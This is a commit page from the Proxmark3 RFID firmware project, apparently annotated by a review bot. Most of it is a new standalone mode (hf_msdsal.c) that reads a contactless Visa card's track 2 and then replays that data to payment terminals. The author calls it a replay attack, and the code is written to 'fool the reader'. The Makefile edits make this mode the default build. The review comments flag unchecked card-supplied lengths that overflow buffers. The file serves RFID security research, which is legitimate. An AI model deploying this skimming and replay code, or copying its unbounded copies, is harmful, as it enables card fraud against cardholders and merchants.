Merge pull request #2 from RfidResearchGroup/master

Update
Bjoern Kerler 2020-04-25 12:00:27 +02:00 committed by GitHub
commit b6de6ac159
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
37 changed files with 679 additions and 707 deletions

View file

@ -3,6 +3,7 @@ All notable changes to this project will be documented in this file.
This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log... This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log...
## [unreleased][unreleased] ## [unreleased][unreleased]
- Added `HF_MSDSAL` standalone mode which read and emulate Visa EMV cards (@Netxing)
- Added Mifare Ultralight tear off experiment (@cintainfinita and @fukmar) - Added Mifare Ultralight tear off experiment (@cintainfinita and @fukmar)
- Added Mifare Desfire Read/Write/Create files/records/values functionality and several fixes to `hf mfdes` (@bkerler) - Added Mifare Desfire Read/Write/Create files/records/values functionality and several fixes to `hf mfdes` (@bkerler)
- Added CreateStdFile command to Mifare `hf mfdes` (@bkerler) - Added CreateStdFile command to Mifare `hf mfdes` (@bkerler)
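Review bot: The new `HF_MSDSAL` changelog entry says the mode works on "Visa EMV cards", while the Makefile.hal help text and the source header added in this same commit describe it as reading and emulating MSD Visa cards. Use one description throughout, and fix the verb agreement in the entry ("which reads and emulates").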

View file

@ -15,13 +15,13 @@
|[Development](#development) | **[Important notes on ModemManager for Linux users](/doc/md/Installation_Instructions/ModemManager-Must-Be-Discarded.md)** | [Validating proxmark client functionality](/doc/md/Use_of_Proxmark/1_Validation.md) | |[Development](#development) | **[Important notes on ModemManager for Linux users](/doc/md/Installation_Instructions/ModemManager-Must-Be-Discarded.md)** | [Validating proxmark client functionality](/doc/md/Use_of_Proxmark/1_Validation.md) |
|[Why didn't you base it on official Proxmark3 Master?](#why-didnt-you-base-it-on-official-proxmark3-master)| **[Homebrew (Mac OS X) & Upgrading HomeBrew Tap Formula](/doc/md/Installation_Instructions/Mac-OS-X-Homebrew-Installation-Instructions.md)** | [First Use and Verification](/doc/md/Use_of_Proxmark/2_Configuration-and-Verification.md)| |[Why didn't you base it on official Proxmark3 Master?](#why-didnt-you-base-it-on-official-proxmark3-master)| **[Homebrew (Mac OS X) & Upgrading HomeBrew Tap Formula](/doc/md/Installation_Instructions/Mac-OS-X-Homebrew-Installation-Instructions.md)** | [First Use and Verification](/doc/md/Use_of_Proxmark/2_Configuration-and-Verification.md)|
|[Proxmark3 GUI](#proxmark3-gui)|**[Setup and build for Windows](/doc/md/Installation_Instructions/Windows-Installation-Instructions.md)**|[Commands & Features](/doc/md/Use_of_Proxmark/3_Commands-and-Features.md)| |[Proxmark3 GUI](#proxmark3-gui)|**[Setup and build for Windows](/doc/md/Installation_Instructions/Windows-Installation-Instructions.md)**|[Commands & Features](/doc/md/Use_of_Proxmark/3_Commands-and-Features.md)|
|[Issues](#issues)|[Blue shark manual](/doc/bt_manual_v10.md) |[Advanced compilation parameters](/doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md)| |[Issues](#issues)|[Blue shark manual](/doc/bt_manual_v10.md) ||
|[Notes on UART](/doc/uart_notes.md)|[Maintainers](/doc/md/Development/Maintainers.md)|[Command Cheat sheet](/doc/cheatsheet.md)| |[Notes on UART](/doc/uart_notes.md)|[Maintainers](/doc/md/Development/Maintainers.md)|[Command Cheat sheet](/doc/cheatsheet.md)|
|[Notes on frame format](/doc/new_frame_format.md)||[More cheat sheets](https://github.com/RfidResearchGroup/proxmark3/wiki/More-cheat-sheets)| |[Notes on frame format](/doc/new_frame_format.md)|[Advanced compilation parameters](/doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md)|[More cheat sheets](https://github.com/RfidResearchGroup/proxmark3/wiki/More-cheat-sheets)|
|[Notes on external flash](/doc/ext_flash_notes.md)||[EMV](/doc/emv_notes.md)| |[Notes on external flash](/doc/ext_flash_notes.md)||[EMV](/doc/emv_notes.md)|
|[Notes on Termux / Android](/doc/termux_notes.md)||[Troubleshooting](/doc/md/Installation_Instructions/Troubleshooting.md)| |[Notes on Termux / Android](/doc/termux_notes.md)|**[Troubleshooting](/doc/md/Installation_Instructions/Troubleshooting.md)**|[Complete client command set](/doc/commands.md)|
|[Notes on tracedata / wireshark](/doc/trace_notes.md)||[JTAG](/doc/jtag_notes.md)| |[Notes on tracedata / wireshark](/doc/trace_notes.md)|**[JTAG](/doc/jtag_notes.md)**||
|[Notes on loclass](/doc/loclass_notes.md)||[Complete client command set](/doc/commands.md)| |[Notes on loclass](/doc/loclass_notes.md)|||
|[Notes on paths](/doc/path_notes.md)||| |[Notes on paths](/doc/path_notes.md)|||
|[Developing standalone mode](/armsrc/Standalone/readme.md)|[Wiki about standalone mode](https://github.com/RfidResearchGroup/proxmark3/wiki/Standalone-mode) || |[Developing standalone mode](/armsrc/Standalone/readme.md)|[Wiki about standalone mode](https://github.com/RfidResearchGroup/proxmark3/wiki/Standalone-mode) ||
|[Donations](#Donations)||| |[Donations](#Donations)|||

View file

@ -1,6 +1,6 @@
# Default standalone if no standalone specified # Default standalone if no standalone specified
DEFAULT_STANDALONE=LF_SAMYRUN DEFAULT_STANDALONE=HF_MSDSAL
HELP_EXAMPLE_STANDALONE=HF_YOUNG HELP_EXAMPLE_STANDALONE=LF_SAMYRUN
# (you can set explicitly STANDALONE= to disable standalone modes) # (you can set explicitly STANDALONE= to disable standalone modes)
STANDALONE?=$(DEFAULT_STANDALONE) STANDALONE?=$(DEFAULT_STANDALONE)
STANDALONE_REQ_DEFS= STANDALONE_REQ_DEFS=
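Review bot: Changing `DEFAULT_STANDALONE` from `LF_SAMYRUN` to `HF_MSDSAL` alters what every build without an explicit `STANDALONE=` ends up with, from an LF HID mode to an HF mode that keeps a payment card's track 2 in memory and replays it. That is a behaviour change for existing users and should be stated as such in the changelog with a reason; if the goal is only to add the new mode, leave the default as it was and list `HF_MSDSAL` as an option.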
@ -11,51 +11,54 @@ define KNOWN_STANDALONE_DEFINITIONS
+==========================================================+ +==========================================================+
| (empty) | No standalone mode | | (empty) | No standalone mode |
+----------------------------------------------------------+ +----------------------------------------------------------+
| LF_SAMYRUN | HID26 read/clone/sim | | LF_SKELETON | standalone mode skeleton |
| (default) | - Samy Kamkar |
+----------------------------------------------------------+
| LF_ICERUN | standalone mode skeleton |
| | - iceman | | | - iceman |
+----------------------------------------------------------+ +----------------------------------------------------------+
| LF_PROXBRUTE | HID ProxII bruteforce |
| | - Brad Antoniewicz |
+----------------------------------------------------------+
| LF_HIDBRUTE | HID corporate 1000 bruteforce |
| | - Federico dotta & Maurizio Agazzini |
+----------------------------------------------------------+
| HF_YOUNG | Mifare sniff/simulation |
| | - Craig Young |
+----------------------------------------------------------+
| HF_MATTYRUN | Mifare sniff/clone |
| | - Matías A. Ré Medina |
+----------------------------------------------------------+
| HF_COLIN | Mifare ultra fast sniff/sim/clone |
| (RDV4 only) | - Colin Brigato |
+----------------------------------------------------------+
| HF_BOG | 14a sniff with ULC/ULEV1/NTAG auth |
| (RDV4 only) | storing in flashmem - Bogito |
+----------------------------------------------------------+
| HF_14ASNIFF | 14a sniff to flashmem |
| (RDV4 only) | |
+----------------------------------------------------------+
| LF_ICEHID | LF HID collector to flashmem |
| (RDV4 only) | |
+----------------------------------------------------------+
| LF_EM4100EMUL | Simulate predefined em4100 tags only | | LF_EM4100EMUL | Simulate predefined em4100 tags only |
| | | | | |
+----------------------------------------------------------+ +----------------------------------------------------------+
| LF_EM4100RWC | Read/simulate em4100 tags & clone it | | LF_EM4100RWC | Read/simulate em4100 tags & clone it |
| | to T555x tags | | | to T555x tags |
+----------------------------------------------------------+ +----------------------------------------------------------+
| LF_HIDBRUTE | HID corporate 1000 bruteforce |
| | - Federico dotta & Maurizio Agazzini |
+----------------------------------------------------------+
| LF_ICEHID | LF HID collector to flashmem |
| (RDV4 only) | |
+----------------------------------------------------------+
| LF_PROXBRUTE | HID ProxII bruteforce |
| | - Brad Antoniewicz |
+----------------------------------------------------------+
| LF_SAMYRUN | HID26 read/clone/sim |
| | - Samy Kamkar |
+----------------------------------------------------------+
| HF_14ASNIFF | 14a sniff to flashmem |
| (RDV4 only) | |
+----------------------------------------------------------+
| HF_BOG | 14a sniff with ULC/ULEV1/NTAG auth |
| (RDV4 only) | storing in flashmem - Bogito |
+----------------------------------------------------------+
| HF_COLIN | Mifare ultra fast sniff/sim/clone |
| (RDV4 only) | - Colin Brigato |
+----------------------------------------------------------+
| HF_LEGIC | Read/simulate Legic Prime tags | | HF_LEGIC | Read/simulate Legic Prime tags |
| | storing in flashmem | | | storing in flashmem |
+----------------------------------------------------------+ +----------------------------------------------------------+
| HF_MATTYRUN | Mifare sniff/clone |
| | - Matías A. Ré Medina |
+----------------------------------------------------------+
| HF_MSDSAL | Read and emulate MSD Visa cards |
| (default) | - Salvador Mendoza |
+----------------------------------------------------------+
| HF_YOUNG | Mifare sniff/simulation |
| | - Craig Young |
+----------------------------------------------------------+
endef endef
STANDALONE_MODES := LF_SAMYRUN LF_ICERUN LF_PROXBRUTE LF_HIDBRUTE LF_ICEHID LF_EM4100EMUL LF_EM4100RWC STANDALONE_MODES := LF_SKELETON LF_EM4100EMUL LF_EM4100RWC LF_HIDBRUTE LF_ICEHID LF_PROXBRUTE LF_SAMYRUN
STANDALONE_MODES += HF_YOUNG HF_MATTYRUN HF_COLIN HF_BOG HF_14ASNIFF HF_LEGIC STANDALONE_MODES += HF_14ASNIFF HF_BOG HF_COLIN HF_LEGIC HF_MATTYRUN HF_MSDSAL HF_YOUNG
STANDALONE_MODES_REQ_SMARTCARD := STANDALONE_MODES_REQ_SMARTCARD :=
STANDALONE_MODES_REQ_FLASH := HF_COLIN HF_BOG HF_14ASNIFF LF_ICEHID STANDALONE_MODES_REQ_FLASH := LF_ICEHID HF_14ASNIFF HF_BOG HF_COLIN
ifneq ($(filter $(STANDALONE),$(STANDALONE_MODES)),) ifneq ($(filter $(STANDALONE),$(STANDALONE_MODES)),)
STANDALONE_PLATFORM_DEFS += -DWITH_STANDALONE_$(STANDALONE) STANDALONE_PLATFORM_DEFS += -DWITH_STANDALONE_$(STANDALONE)
ifneq ($(filter $(STANDALONE),$(STANDALONE_MODES_REQ_SMARTCARD)),) ifneq ($(filter $(STANDALONE),$(STANDALONE_MODES_REQ_SMARTCARD)),)
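Review bot: The help table describes `HF_LEGIC` as "storing in flashmem", yet the entry has no "(RDV4 only)" marker and the mode is absent from `STANDALONE_MODES_REQ_FLASH := LF_ICEHID HF_14ASNIFF HF_BOG HF_COLIN`. Since this hunk already reorders both the table and the lists, either add `HF_LEGIC` to the flash-required list (and mark it in the table) or correct its description, so the requirement lists agree with the help text.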

View file

@ -1,9 +1,9 @@
# Generic standalone Mode injection of source code # Generic standalone Mode injection of source code
SRC_STANDALONE = placeholder.c SRC_STANDALONE = placeholder.c
# WITH_STANDALONE_LF_ICERUN # WITH_STANDALONE_LF_SKELETON
ifneq (,$(findstring WITH_STANDALONE_LF_ICERUN,$(APP_CFLAGS))) ifneq (,$(findstring WITH_STANDALONE_LF_SKELETON,$(APP_CFLAGS)))
SRC_STANDALONE = lf_icerun.c SRC_STANDALONE = lf_skeleton.c
endif endif
# WITH_STANDALONE_LF_SAMYRUN # WITH_STANDALONE_LF_SAMYRUN
ifneq (,$(findstring WITH_STANDALONE_LF_SAMYRUN,$(APP_CFLAGS))) ifneq (,$(findstring WITH_STANDALONE_LF_SAMYRUN,$(APP_CFLAGS)))
@ -53,3 +53,7 @@ endif
ifneq (,$(findstring WITH_STANDALONE_HF_LEGIC,$(APP_CFLAGS))) ifneq (,$(findstring WITH_STANDALONE_HF_LEGIC,$(APP_CFLAGS)))
SRC_STANDALONE = hf_legic.c SRC_STANDALONE = hf_legic.c
endif endif
# WITH_STANDALONE_LF_MSDSAL
ifneq (,$(findstring WITH_STANDALONE_HF_MSDSAL,$(APP_CFLAGS)))
SRC_STANDALONE = hf_msdsal.c
endif
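Review bot: The comment above the new block reads `# WITH_STANDALONE_LF_MSDSAL`, but the define tested on the next line is `WITH_STANDALONE_HF_MSDSAL` and the mode is an HF one. Change the comment to `# WITH_STANDALONE_HF_MSDSAL` so that a search for the define finds its block.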

View file

@ -0,0 +1,454 @@
//-----------------------------------------------------------------------------
// Salvador Mendoza (salmg.net), 2020
//
// This code is licensed to you under the terms of the GNU GPL, version 2 or,
// at your option, any later version. See the LICENSE.txt file for the text of
// the license.
//-----------------------------------------------------------------------------
// Code for reading and emulating 14a technology aka MSDSal by Salvador Mendoza
//-----------------------------------------------------------------------------
#include "standalone.h"
#include "proxmark3_arm.h"
#include "appmain.h"
#include "fpgaloader.h"
#include "util.h"
#include "dbprint.h"
#include "ticks.h"
#include "string.h"
#include "BigBuf.h"
#include "iso14443a.h"
#include "protocols.h"
#include "cmd.h"
void ModInfo(void) {
DbpString(" HF - Reading Visa cards & Emulating a Visa MSD Transaction(ISO14443) - (Salvador Mendoza)");
}
/* This standalone implements two different modes: reading and emulating.
*
* The initial mode is reading with LED A as guide.
* In this mode, the Proxmark expects a Visa Card,
* and will act as card reader. Trying to find track 2.
*
* If the Proxmark found a track 2, it will change to emulation mode (LED C) automatically.
* During this mode the Proxmark will behave as card, emulating a Visa MSD transaction
* using the pre-saved track2 from the previous reading.
*
* It is possible to jump from mode to another by simply pressing the button.
* However, to jump from reading to emulation mode, the LED C as to be on, which
* means having a track 2 in memory.
*
* Keep pressing the button down will quit the standalone cycle.
*
* LEDs:
* LED A = in reading mode
* LED C = in emulation(a track 2 in memory) mode
* LED A + LED C = in reading mode, but you can jump back to emulation mode by pressing the button
* LED B = receiving/sending commands, activity
*
*
* Reading or emulating ISO-14443A technology is not limited to payment cards. This example
* was not only designed to make a replay attack, but to open new possibilities in the ISO-14443A
* technologies. Be brave enough to share your knowledge & inspire others. Salvador Mendoza.
*/
uint8_t ppdol [255] = {0x80, 0xA8, 0x00, 0x00, 0x02, 0x83, 0x00}; // Default GET PROCESSING
uint8_t treatPDOL(uint8_t *apdu) { //Generate GET PROCESSING
uint8_t plen = 7;
//PDOL Format: 80 A8 00 00 + (PDOL Length+2) + 83 + PDOL Length + PDOL + 00
for (uint8_t i = 1; i <= apdu[0]; i++) { //Magic stuff, the generation order is important
if (apdu[i] == 0x9F && apdu[i + 1] == 0x66) { //Terminal Transaction Qualifiers
ppdol[plen] = 0xF6;
ppdol[plen + 1] = 0x20;
ppdol[plen + 2] = 0xC0;
ppdol[plen + 3] = 0x00;
plen += 4;
i += 2;
} else if (apdu[i] == 0x9F && apdu[i + 1] == 0x1A) { //Terminal Country Code
ppdol[plen] = 0x9F;
ppdol[plen + 1] = 0x1A;
plen += 2;
i += 2;
} else if (apdu[i] == 0x5F && apdu[i + 1] == 0x2A) { //Transaction Currency Code
ppdol[plen] = 0x5F;
ppdol[plen + 1] = 0x2A;
plen += 2;
i += 2;
} else if (apdu[i] == 0x9A) { //Transaction Date
ppdol[plen] = 0x9A;
ppdol[plen + 1] = 0x9A;
ppdol[plen + 2] = 0x9A;
plen += 3;
i += 1;
} else if (apdu[i] == 0x95) { //Terminal Verification Results
ppdol[plen] = 0x95;
ppdol[plen + 1] = 0x95;
ppdol[plen + 2] = 0x95;
ppdol[plen + 3] = 0x95;
ppdol[plen + 4] = 0x95;
plen += 5;
i += 1;
} else if (apdu[i] == 0x9C) { //Transaction Type
ppdol[plen] = 0x9C;
plen += 1;
i += 1;
} else if (apdu[i] == 0x9F && apdu[i + 1] == 0x37) { //Unpredictable Number
ppdol[plen] = 0x9F;
ppdol[plen + 1] = 0x37;
ppdol[plen + 2] = 0x9F;
ppdol[plen + 3] = 0x37;
plen += 4;
i += 2;
} else { //To the others, add "0" to complete the format depending on its range
uint8_t u = apdu[i + 2];
while (u > 0) {
ppdol[plen] = 0;
plen += 1;
u--;
}
i += 2;
}
}
ppdol[4] = (plen + 2) - 7; // Length of PDOL + 2
ppdol[6] = plen - 7; // Real length
plen++; // +1 because the last 0
ppdol[plen] = 0x00; // Add the last 0 to the challenge
return plen;
}
void RunMod() {
StandAloneMode();
Dbprintf(_YELLOW_(">>") "Reading Visa cards & Emulating a Visa MSD Transaction a.k.a. MSDSal Started<<");
FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
//For reading process
iso14a_card_select_t card_a_info;
uint8_t apdubuffer[MAX_FRAME_SIZE] = { 0x00 };
//Specific for Visa cards: select ppse, select Visa AID, GET PROCESSING, SFI
uint8_t ppse[20] = {0x00, 0xA4, 0x04, 0x00, 0x0e, 0x32, 0x50, 0x41, 0x59, 0x2e, 0x53, 0x59, 0x53, 0x2e, 0x44, 0x44, 0x46, 0x30, 0x31, 0x00};
uint8_t visa[13] = {0x00, 0xA4, 0x04, 0x00, 0x07, 0xa0, 0x00, 0x00, 0x00, 0x03, 0x10, 0x10, 0x00};
uint8_t processing [8] = {0x80, 0xA8, 0x00, 0x00, 0x02, 0x83, 0x00, 0x00};
uint8_t sfi[5] = {0x00, 0xb2, 0x01, 0x0c, 0x00};
uint8_t *apdus[4] = {ppse, visa, processing, sfi};
uint8_t apdusLen [4] = { sizeof(ppse), sizeof(visa), sizeof(processing), sizeof(sfi)};
uint8_t pdol[50], plen = 8;
bool existpdol;
// - MSD token card format -
//
//Card number: 4412 3456 0578 1234
//Expiration date: 17/11
//Service code: 201
//Discretionary data: 0000030000991
//char token[19] = {0x44,0x12,0x34,0x56,0x05,0x78,0x12,0x34,0xd1,0x71,0x12,0x01,0x00,0x00,0x03,0x00,0x00,0x99,0x1f};
//
// It is possible to initialize directly the emulation mode, having "token" with data and set "chktoken" = true ;)
//
char token[19] = {0x00};
bool chktoken = false;
//For emulation steps
#define ATQA 0
#define UIDC1 1
#define SAKC1 3
#define RATS 5
#define SIGNATURE 7
// Allocate 512 bytes for the dynamic modulation, created when the reader queries for it
// Such a response is less time critical, so we can prepare them on the fly
#define DYNAMIC_RESPONSE_BUFFER_SIZE 64
#define DYNAMIC_MODULATION_BUFFER_SIZE 512
uint8_t flags = FLAG_4B_UID_IN_DATA; //UID 4 bytes(could be 7 bytes if needed it)
uint8_t data[PM3_CMD_DATA_SIZE] = {0x00}; // in case there is a read command received we shouldn't break
uint8_t visauid[7] = {0x01, 0x02, 0x03, 0x04};
memcpy(data, visauid, 4);
// to initialize the emulation
uint8_t tagType = 4; // 4 = ISO/IEC 14443-4 - javacard (JCOP)
tag_response_info_t *responses;
uint32_t cuid = 0;
uint32_t counters[3] = { 0x00, 0x00, 0x00 };
uint8_t tearings[3] = { 0xbd, 0xbd, 0xbd };
uint8_t pages = 0;
// command buffers
uint8_t receivedCmd[MAX_FRAME_SIZE] = { 0x00 };
uint8_t receivedCmdPar[MAX_PARITY_SIZE] = { 0x00 };
uint8_t dynamic_response_buffer[DYNAMIC_RESPONSE_BUFFER_SIZE];
uint8_t dynamic_modulation_buffer[DYNAMIC_MODULATION_BUFFER_SIZE];
// to know the transaction status
uint8_t prevCmd = 0;
// handler - command responses
tag_response_info_t dynamic_response_info = {
.response = dynamic_response_buffer,
.response_n = 0,
.modulation = dynamic_modulation_buffer,
.modulation_n = 0
};
// States for standalone
#define STATE_READ 0
#define STATE_EMU 1
uint8_t state = STATE_READ;
//Checking if the user wants to go directly to emulation mode using a hardcoded track 2
if (chktoken == true && token[0] != 0x00) {
state = STATE_EMU;
Dbprintf(_YELLOW_("[") "Initialized emulation mode " _YELLOW_("]"));
DbpString("\n"_YELLOW_("!!") "Waiting for a card reader...");
} else {
DbpString(_YELLOW_("[") "Initialized reading mode " _YELLOW_("]"));
DbpString("\n"_YELLOW_("!!") "Waiting for a Visa card...");
}
for (;;) {
WDT_HIT();
// exit from RunMod, send a usbcommand.
if (data_available()) break;
// Was our button held down or pressed?
int button_pressed = BUTTON_HELD(1000);
if (button_pressed == 1) //Holding down the button
break;
else if (button_pressed == -1) { //Pressing one time change between reading & emulation
if (state == STATE_READ) {
if (chktoken == true && token[0] != 0x00) { //Only change to emulation if it saved a track 2 in memory
state = STATE_EMU;
Dbprintf(_YELLOW_("[") "In emulation mode " _YELLOW_("]"));
} else
Dbprintf(_YELLOW_("!!") "Nothing in memory to emulate");
} else {
state = STATE_READ;
Dbprintf(_YELLOW_("[") "In reading mode " _YELLOW_("]"));
}
}
SpinDelay(500);
if (state == STATE_READ) {
LED_A_ON();
if (chktoken)
LED_C_ON();
iso14443a_setup(FPGA_HF_ISO14443A_READER_MOD);
if (iso14443a_select_card(NULL, &card_a_info, NULL, true, 0, false)) {
Dbprintf(_YELLOW_("+") "Found ISO 14443 Type A!");
for (uint8_t i = 0; i < 4; i++) {
chktoken = false;
LED_C_OFF();
LED_B_ON();
uint8_t apdulen = iso14_apdu(apdus[i], (uint16_t) apdusLen[i], false, apdubuffer, NULL);
if (apdulen > 0) {
Dbprintf(_YELLOW_("[") "Proxmark command " _YELLOW_("]"));
Dbhexdump(apdusLen[i], apdus[i], false);
Dbprintf(_GREEN_("[") "Card answer " _GREEN_("]"));
Dbhexdump(apdulen - 2, apdubuffer, false);
Dbprintf("----");
for (uint8_t u = 0; u < apdulen; u++) {
if (i == 1) {
if (apdubuffer[u] == 0x9F && apdubuffer[u + 1] == 0x38) { //Check for PDOL
for (uint8_t e = 0; e <= apdubuffer[u + 2]; e++)
pdol[e] = apdubuffer[u + e + 2];
plen = treatPDOL(pdol); //Generate a challenge
apdus[2] = ppdol;
apdusLen[2] = plen;
existpdol = true;
}
} else if (i == 3) {
if (apdubuffer[u] == 0x57 && apdubuffer[u + 1] == 0x13 && !chktoken) { //Find track 2
chktoken = true;
memcpy(&token, &apdubuffer[u + 2], 19);
break;
}
}
}
if (i == 1) {
Dbprintf(_GREEN_("[") "Challenge generated " _GREEN_("]"));
Dbhexdump(plen, existpdol ? ppdol : processing, false);
}
} else {
Dbprintf(_YELLOW_("!!") "Error reading the card");
}
LED_B_OFF();
}
if (chktoken) {
Dbprintf(_RED_("[") "Track 2 " _RED_("]"));
Dbhexdump(19, (uint8_t *)token, false);
Dbprintf(_YELLOW_("!!") "Card number");
Dbhexdump(8, (uint8_t *)token, false);
DbpString("---");
LED_C_ON();
state = STATE_EMU;
Dbprintf(_YELLOW_("[") "Initialized emulation mode " _YELLOW_("]"));
DbpString("\n"_YELLOW_("!!") "Waiting for a card reader...");
}
}
} else if (state == STATE_EMU) {
LED_A_OFF();
LED_C_ON();
// free eventually allocated BigBuf memory but keep Emulator Memory
BigBuf_free_keep_EM();
if (SimulateIso14443aInit(tagType, flags, data, &responses, &cuid, counters, tearings, &pages) == false) {
BigBuf_free_keep_EM();
reply_ng(CMD_HF_MIFARE_SIMULATE, PM3_EINIT, NULL, 0);
DbpString(_YELLOW_("!!") "Error initializing the emulation process!");
SpinDelay(500);
state = STATE_READ;
DbpString(_YELLOW_("[") "Initialized reading mode " _YELLOW_("]"));
DbpString("\n" _YELLOW_("!!") "Waiting for a Visa card...");
break;
}
// We need to listen to the high-frequency, peak-detected path.
iso14443a_setup(FPGA_HF_ISO14443A_TAGSIM_LISTEN);
int len = 0; // command length
int retval = PM3_SUCCESS; // to check emulation status
clear_trace();
set_tracing(true);
for (;;) {
LED_B_OFF();
// Clean receive command buffer
if (!GetIso14443aCommandFromReader(receivedCmd, receivedCmdPar, &len)) {
Dbprintf(_YELLOW_("!!") "Emulator stopped");
retval = PM3_EOPABORTED;
break;
}
tag_response_info_t *p_response = NULL;
LED_B_ON();
// dynamic_response_info will be in charge of responses
dynamic_response_info.response_n = 0;
// Checking the commands order is important and elemental
if (receivedCmd[0] == ISO14443A_CMD_REQA && len == 1) { // Received a REQUEST
DbpString(_YELLOW_("+") "REQUEST Received");
p_response = &responses[ATQA];
} else if (receivedCmd[0] == ISO14443A_CMD_HALT && len == 4) { // Received a HALT
DbpString(_YELLOW_("+") "Received a HALT");
p_response = NULL;
} else if (receivedCmd[0] == ISO14443A_CMD_WUPA && len == 1) { // Received a WAKEUP //Este!!
DbpString(_YELLOW_("+") "WAKEUP Received");
p_response = &responses[ATQA];
prevCmd = 0;
} else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 2) { // Received request for UID (cascade 1)
DbpString(_YELLOW_("+") "Request for UID C1");
p_response = &responses[UIDC1];
} else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 9) { // Received a SELECT (cascade 1)
DbpString(_YELLOW_("+") "Request for SELECT S1");
p_response = &responses[SAKC1];
} else if (receivedCmd[0] == ISO14443A_CMD_RATS && len == 4) { // Received a RATS request
DbpString(_YELLOW_("+") "Request for RATS");
p_response = &responses[RATS];
} else {
Dbprintf(_YELLOW_("[") "Card reader command " _YELLOW_("]"));
Dbhexdump(len, receivedCmd, false);
if (receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) { //Emulate a Visa MSD(Magnetic stripe data) card
uint8_t ppsea[39] = {0x6F, 0x23, 0x84, 0x0E, 0x32, 0x50, 0x41, 0x59, 0x2E, 0x53, 0x59, 0x53, 0x2E, 0x44, 0x44, 0x46, 0x30, 0x31, 0xA5, 0x11, 0xBF, 0x0C, 0x0E, 0x61, 0x0C, 0x4F, 0x07, 0xA0, 0x00, 0x00, 0x00, 0x03, 0x10, 0x10, 0x87, 0x01, 0x01, 0x90, 0x00};
uint8_t processing[10] = {0x80, 0x06, 0x00, 0x80, 0x08, 0x01, 0x01, 0x00, 0x90, 0x00};
uint8_t visauid[34] = {0x6F, 0x1E, 0x84, 0x07, 0xA0, 0x00, 0x00, 0x00, 0x03, 0x10, 0x10, 0xA5, 0x13, 0x50, 0x0B, 0x56, 0x49, 0x53, 0x41, 0x20, 0x43, 0x52, 0x45, 0x44, 0x49, 0x54, 0x9F, 0x38, 0x03, 0x9F, 0x66, 0x02, 0x90, 0x00};
uint8_t last[4] = {0x70, 0x15, 0x57, 0x13};
uint8_t card[25];
uint8_t statusapdu[2] = {0x90, 0x00};
uint8_t finished[2] = {0x6f, 0x00};
memcpy(&card[0], last, sizeof(last));
memcpy(&card[4], token, sizeof(token));
memcpy(&card[23], statusapdu, sizeof(statusapdu));
dynamic_response_info.response[0] = receivedCmd[0];
//Depending on card reader commands, the Proxmark will answer to fool the reader
if (receivedCmd[2] == 0xA4 && receivedCmd[6] == 0x32 && prevCmd == 0) { //Respond with PPSE
memcpy(&dynamic_response_info.response[1], ppsea, sizeof(ppsea));
dynamic_response_info.response_n = sizeof(ppsea) + 1;
prevCmd++;
} else if (receivedCmd[2] == 0xA4 && receivedCmd[10] == 0x03 && receivedCmd[11] == 0x10 && prevCmd == 1) { //Respond Visa AID
memcpy(&dynamic_response_info.response[1], visauid, sizeof(visauid));
dynamic_response_info.response_n = sizeof(visauid) + 1;
prevCmd++;
} else if (receivedCmd[1] == 0x80 && receivedCmd[2] == 0xA8 && receivedCmd[6] == 0x83 && prevCmd == 2) { //GET PROCESSING
memcpy(&dynamic_response_info.response[1], processing, sizeof(processing));
dynamic_response_info.response_n = sizeof(processing) + 1;
prevCmd++;
} else if (receivedCmd[1] == 0x00 && receivedCmd[2] == 0xB2 && prevCmd == 3) { //SFI
memcpy(&dynamic_response_info.response[1], card, sizeof(card));
dynamic_response_info.response_n = sizeof(card) + 1;
prevCmd++;
} else {
memcpy(&dynamic_response_info.response[1], finished, sizeof(finished));
dynamic_response_info.response_n = sizeof(finished) + 1;
if (prevCmd == 5) {
prevCmd = 0;
}
}
} else {
Dbprintf(_YELLOW_("!!") "Received unknown command!");
if (prevCmd < 4) {
memcpy(dynamic_response_info.response, receivedCmd, len);
dynamic_response_info.response_n = len;
} else {
dynamic_response_info.response_n = 0;
}
}
}
if (dynamic_response_info.response_n > 0) {
Dbprintf(_GREEN_("[") "Proxmark3 answer " _GREEN_("]"));
Dbhexdump(dynamic_response_info.response_n, dynamic_response_info.response, false);
Dbprintf("----");
// Add CRC bytes, always used in ISO 14443A-4 compliant cards
AddCrc14A(dynamic_response_info.response, dynamic_response_info.response_n);
dynamic_response_info.response_n += 2;
if (prepare_tag_modulation(&dynamic_response_info, DYNAMIC_MODULATION_BUFFER_SIZE) == false) {
SpinDelay(500);
DbpString(_YELLOW_("!!") "Error preparing Proxmark to answer!");
continue;
}
p_response = &dynamic_response_info;
}
if (p_response != NULL) {
EmSendPrecompiledCmd(p_response);
}
}
switch_off();
set_tracing(false);
BigBuf_free_keep_EM();
reply_ng(CMD_HF_MIFARE_SIMULATE, retval, NULL, 0);
}
}
DbpString(_YELLOW_("[=]") "exiting");
LEDsoff();
}
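Review bot: In the `i == 1` branch of the read loop, the PDOL copy `for (uint8_t e = 0; e <= apdubuffer[u + 2]; e++) pdol[e] = apdubuffer[u + e + 2];` trusts a length byte supplied by the card, but `pdol` is declared as `uint8_t pdol[50]`, so any length above 49 writes past the stack buffer, and a length of 0xFF never terminates because `e` is a `uint8_t`. Check the length against `sizeof(pdol)` and against `apdulen` before copying, and skip the card on failure. The same missing-bounds pattern recurs elsewhere in the file: `treatPDOL()` reads `apdu[i + 1]` and `apdu[i + 2]` and advances `plen` into `ppdol` with no limit; the tag scan reads `apdubuffer[u + 1]` when `u == apdulen - 1` and copies 19 bytes of track 2 without confirming they lie inside the response; and the emulation branch indexes `receivedCmd[6]`, `receivedCmd[10]` and `receivedCmd[11]` without checking `len`. Two smaller points: `existpdol` is read in the "Challenge generated" dump but is never initialised, and the `break` after a failed `SimulateIso14443aInit` leaves the outer loop and exits the mode even though `state` was just set back to `STATE_READ` and the log says reading mode was initialised.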

View file

@ -85,7 +85,7 @@ void RunMod() {
Dbprintf("[=] >> LF EM4100 simulator started <<"); Dbprintf("[=] >> LF EM4100 simulator started <<");
int selected = 0; //selected slot after start int selected = 0; //selected slot after start
